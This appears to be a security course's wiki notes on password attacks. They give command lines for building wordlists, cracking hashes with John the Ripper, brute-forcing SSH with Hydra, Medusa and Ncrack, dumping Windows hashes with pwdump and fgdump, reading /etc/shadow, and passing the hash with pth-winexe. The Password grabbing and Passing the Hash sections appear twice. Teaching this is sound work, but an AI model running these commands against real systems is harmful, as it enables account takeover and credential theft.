Password Cracking Attacks - Paiet/SEC-335 GitHub Wiki

Dictionary Attacks
- File containing a list of words/strings
- Pass Cracking software looks to this list comparing the hashed/encrypted value of the password with the hashed/encrypted value of each word in the dictionary
- Where do dictionaries come from?
  - Download them
    - https://wiki.skullsecurity.org/index.php?title=Passwords
      - rockyou.txt
      - john.txt (comes with John the Ripper)
  - Create them
    - Use cewl to create a dictionary file
      - Scours web sites for words of a defined length, then outputs those words to a file
      - cewl kioptrix3.com -m 6 -w kioptrix_dict.txt
- Password Mutation
  - Passwords can have criteria that must be met
    - At least 1 number
      - Number must be at beginning/middle/end of password
    - At least 1 special character (!@#$%^ etc)
    - At least x characters long
  - We can modify a dictionary to add these criteria when attacking
    - Create a Bash script, or...
Brute-Force Attacks
- Attempting every possible permutation of a character set
  - a, aa, aaa, aaaa, A, AA, AAA, AAAA, etc.
  - Time consuming
  - Resource consuming
- Key-space Brute-Force
  - crunch can generate all possible char combos and save to a file
    - Creating a dictionary file using every possible chars from given set
    - These files can get LARGE!!!
  - crunch 4 4 0123456789ABC -o crunch_file.txt
    - -f /usr/share/crunch/charset.lst (use pre-defined char set)
      - mixalpha (use only letters)
      - numeric (use only numbers)
      - all
      - space
      - mixalpha-numeric-all-space
    - -t ,@^% (specifies a pattern)
      - , = Upper-case letter
      - @ = Lower-case letter
      - ^ = Special Characters including space
      - % = Numbers
        
        crunch 8 8 -t ^,@@^@%%
Password attack/crack tools
- John the Ripper
  - john stolen_pass.txt (standard Brute-Force)
  - john stolen_pass.txt --wordlist=myDictionary.txt (dictionary attack)
    - Password Mutations
    - Modify /etc/john/john.conf
```
[List.Rules:Example]
cAz"[0-9]"
cAz"[0-9][0-9]"
cAz"[!@$&*]"
cAz"[0-9][!@$&*]"
```
    - Invoke custom ruleset
      - john hash.txt --wordlist=custom_dict.txt --rules=Example
      - https://www.gracefulsecurity.com/custom-rules-for-john-the-ripper/
      - https://www.gracefulsecurity.com/custom-rules-for-john-the-ripper-examples/
  - unshadow passwd.txt shadow.txt (combines passwd and shadow files)
    - add > unshadow.txt and then...
      - john unshadow.txt --wordlist=myDictionary.txt --rules=myRules
  - john -show stolen_pass.txt (shows cracked passwords for given file)
- Others
  - l0phtcrack
  - ophcrack
  - Cain&Able
  - hashcat
  - rainbowcrack
  - Online crackers
    - https://crackstation.net
Online Brute-Force
- Attacks online services like
  - HTTP, SSH, VNC, FTP, SNMP, POP3, etc.
- Could write a script
  - Show bash Brute-Force script :)
- Use a tool for automation
  - Hydra
  - Medusa
  - Ncrack
- Attacking: SSH
  - hydra -l ftp2 -P rockyou.txt 127.0.0.1 ssh
  - medusa -h 127.0.0.1 -u ftp2 -P rockyou.txt -M ssh
  - ncrack -vv --user ftp2 -P rockyou.txt ssh://127.0.0.1
Password grabbing
- Linux
  - You read/copy the /etc/shadow file
- Windows
  - Encrypts the password hash file at startup, but loads it into memory for authenticating
  - Grab the hash from memory using
    - pwdump (dumps local file only)
      - pwdump -o dumpfile.txt -u admin_user computer_name
      - pwdump -o dumpfile.txt -u administrator ADMINWRKSTATION
    - fgdump (can also dump remote )
      - fgdump.exe -h 127.0.0.1 -u admin_user
- Clear-text
  - Use wireshark to grab Telnet/FTP/etc.
Passing the Hash
- Hash value doesn't always need to be cracked
- You can just pass the hash value as the password
  - Caveats
    - This works against NTLM authentication
      - Windows
      - Linux/Samba using NTLM
    - Any service using LM or NTLM(v1and2) for authentication is vulnerable
      - Look for SMB services/ports
      - Read SANS Institute white paper here>> http://tinyurl.com/zkzsmwd
    - A word on Windows 10
      - Win10 isn't vulnerable unless...
        
        Booted into safe mode
- How to pass the hash
  - pth-winexe -U administrator%EMPTY-LM-HASH:HASH-FROM-FGDUMP //ip cmd
Password grabbing
- Linux
  - You read/copy the /etc/shadow file
- Windows
  - Encrypts the password hash file at startup, but loads it into memory for authenticating
  - Grab the hash from memory using
    - pwdump (dumps local file only)
      - pwdump -o dumpfile.txt -u admin_user computer_name
      - pwdump -o dumpfile.txt -u administrator ADMINWRKSTATION
    - fgdump (can also dump remote )
      - fgdump.exe -h 127.0.0.1 -u admin_user
- Clear-text
  - Use wireshark to grab Telnet/FTP/etc.
Passing the Hash
- Hash value doesn't always need to be cracked
- You can just pass the hash value as the password
  - Caveats
    - This works against NTLM authentication
      - Windows
      - Linux/Samba using NTLM
    - Any service using LM or NTLM(v1and2) for authentication is vulnerable
      - Look for SMB services/ports
      - Read SANS Institute white paper here>> http://tinyurl.com/zkzsmwd
    - A word on Windows 10
      - Win10 isn't vulnerable unless...
        
        Booted into safe mode
- How to pass the hash
  - pth-winexe -U administrator%EMPTY-LM-HASH:HASH-FROM-FGDUMP //ip cmd